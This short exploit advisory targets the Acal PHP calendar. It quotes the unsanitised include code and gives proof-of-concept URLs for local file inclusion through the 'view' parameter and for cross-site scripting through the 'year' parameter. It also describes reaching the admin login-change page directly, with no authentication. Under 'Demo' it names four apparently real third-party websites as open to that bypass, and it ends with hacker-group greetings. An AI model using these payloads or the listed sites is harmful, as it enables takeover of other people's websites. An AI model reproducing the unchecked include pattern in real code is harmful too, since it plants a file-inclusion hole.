[+] Author: TUNISIAN CYBER [+] Exploit Title: Acal LFI/XSS/Auth Bypass Vulnerabilities [+] Category: WebApp [+] Google Dork: Use your mind [+] Tested on: KaliLinux [+] Vendor: http://acalproj.sourceforge.net/ ######################################################################################## +Description: A web based event calendar that does not require a database server. It is made to be easy to install and to be able to run on just about any typical ISP's server with PHP installed. +Exploit: Acal Suffers from an LFI,XSS and Auth Bypass vulnerabilities: 1/LFI: File(s): example.php : Lines 24--30 Parameter:view [PHP] // DO NOT EDIT if (!isset($_GET['view'])) { include $path . 'embed/' . $view . '.php'; } else { include $path . 'embed/' . $_GET['view'] . '.php'; } [PHP] P.O.C: 127.0.0.1/calendar/embed/example/example.php?view=[LFI] 2/ XSS: 127.0.0.1/calendar/calendar.php?year= http://s13.postimg.org/u9bvlrg1i/www.jpg 3/Auth Bypass: You can access directly to the admin panel and you can change login details: 127.0.0.1/calendar/admin/changelogin.php Demo: http://www.benifeade.com/i/calendar/admin/changelogin.php http://www.diprove.unimi.it/calendar/admin/edit.php http://tavernadeglieroi.altervista.org/calendar/admin/edit.php http://www.davidcarrjr.com/CAL/calendar/admin/changelogin.php ./3nD ######################################################################################## Greets to: XMaX-tn, N43il HacK3r, XtechSEt Sec4Ever Members: DamaneDz UzunDz GEOIX ########################################################################################